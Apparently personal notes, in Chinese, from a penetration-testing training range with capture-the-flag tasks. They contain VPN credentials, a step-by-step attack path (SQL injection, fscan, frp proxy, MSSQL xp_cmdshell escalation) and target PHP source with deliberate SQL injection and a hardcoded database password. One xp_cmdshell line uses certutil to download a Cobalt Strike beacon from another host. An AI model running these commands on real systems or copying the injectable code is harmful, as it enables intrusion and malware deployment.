# pst:2024年12月2日
反弹IP
# vpn
1. Cisco AnyConnect Secure Mobility Client
101.37.160.193:62443
2. 场景测试/mxl49dm9
3. 场景测试二/f40sbwfd 1
4. 场景测试三/6bmc0cvm
2. OpenConnect-GUI VPN client
https://192.168.197.110:10034
1. student/Student@User~69 1
2. studentN/1qaz@WSX4
3. studentM/1qaz@WSX33
# 靶机
1. http://192.168.100.2:8082/
[phpinfo](http://192.168.100.2:8082/juece/info.php) 收集绝对路径`C:/phpstudy_pro/WWW`,前端弱口令,拿到1个`flag`,
查询sqlmap-post注入、数据库users表1个`flag`,拿到shell、
目录`C:/phpstudy_pro/flag.txt`1个`flag`,收集MySQL数据库配置,
上线CS(可选),搭建frp/ew代理,fscan 探测内网
192.168.1.2 内网
2. mssql 数据库
使用 MySQL收集的信息连接,数据库1个flag
利用 xp_cmdshell 提权
上线CS(可选)
反弹IP
# vpn
1. Cisco AnyConnect Secure Mobility Client
101.37.160.193:62443
2. 场景测试/mxl49dm9
3. 场景测试二/f40sbwfd 1
4. 场景测试三/6bmc0cvm
2. OpenConnect-GUI VPN client
https://192.168.197.110:10034
1. student/Student@User~69 1
2. studentN/1qaz@WSX4
3. studentM/1qaz@WSX33
# 靶机
C:/phpstudy_pro/WWW/juece/login/login.php<?php
session_start(); // 始终开始会话
// 数据库配置
$host = '127.0.0.1';
$dbname = 'security';
$username = 'root';
$password = 'yancaokaoshi123#';
try {
$pdo = new PDO("mysql:host=$host;dbname=$dbname", $username, $password);
// 设置 PDO 错误模式为异常
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// 获取输入的用户名和密码
$userid = isset($_POST['userid']) ? $_POST['userid'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
// 假设密码已经过哈希处理
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$userid, hash('md5', $password)]); // 假设存储时使用了sha256哈希
if ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
// 登录成功
// 设置cookie
$token = bin2hex(random_bytes(32));
$token_expiration = time() + 86400;
$stmt = $pdo->prepare("INSERT INTO user_tokens ( token, expiration) VALUES ( ?, ?)");
$stmt->execute([ $token, $token_expiration]);
setcookie("user_token", $token, $token_expiration);
// 重定向到新的URL
sleep(10);
header("Location: /juece/login/index.php");
exit;
} else {
// 登录失败
#echo hash('md5', $password);
echo "用户名或密码错误";
}
} catch(PDOException $e) {
echo "数据库连接失败: " . $e->getMessage();
}
?>C:/phpstudy_pro/WWW/juece/login/sql.php<?php
// 数据库连接参数
$servername = "localhost";
$username = "root";
$password = "yancaokaoshi123#";
$dbname = "security";
header('content-type:text/css;charset=gbk');
// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);
// 检查连接是否成功
if ($conn->connect_error) {
die("连接失败: " . $conn->connect_error);
}
// 从GET参数中获取username,并且没有做任何过滤或转义(这是非常危险的!)
$id = isset($_POST['username']) ? $_POST['username'] : '';
// 构造SQL查询(这里非常危险,因为它容易受到SQL注入攻击)
$sql = "SELECT * FROM users WHERE id = '$id'"; // 假设你有一个名为users的表,并且它有一个名为id的列
#echo $sql;
// 执行查询
$result = $conn->query($sql);
if ($result->num_rows > 0) {
// 输出数据
while($row = $result->fetch_assoc()) {
#echo "ID: " . $row["id"]. " - Name: " . $row["username"]; // 假设你的表有name列
}
} else {
echo "没有找到与给定ID匹配的结果";
}
// 关闭连接
$conn->close();
?>1. http://192.168.100.2:8082/
[phpinfo](http://192.168.100.2:8082/juece/info.php) 收集绝对路径`C:/phpstudy_pro/WWW`,前端弱口令,拿到1个`flag`,
查询sqlmap-post注入、数据库users表1个`flag`,拿到shell、
目录`C:/phpstudy_pro/flag.txt`1个`flag`,收集MySQL数据库配置,
上线CS(可选),搭建frp/ew代理,fscan 探测内网
192.168.1.2 内网
fscan.exe -h 192.168.1.0/24 -o fscan-192.168.1.0.txt
172.29.255.253 对应反弹IP 192.168.100.2432. mssql 数据库
使用 MySQL收集的信息连接,数据库1个flag
利用 xp_cmdshell 提权
mimikatzEXEC xp_cmdshell 'certutil -urlcache -split -f http://192.168.80.178/beacon_x64.exe C:\Windows\Temp\beacon_x64.exe';上线CS(可选)
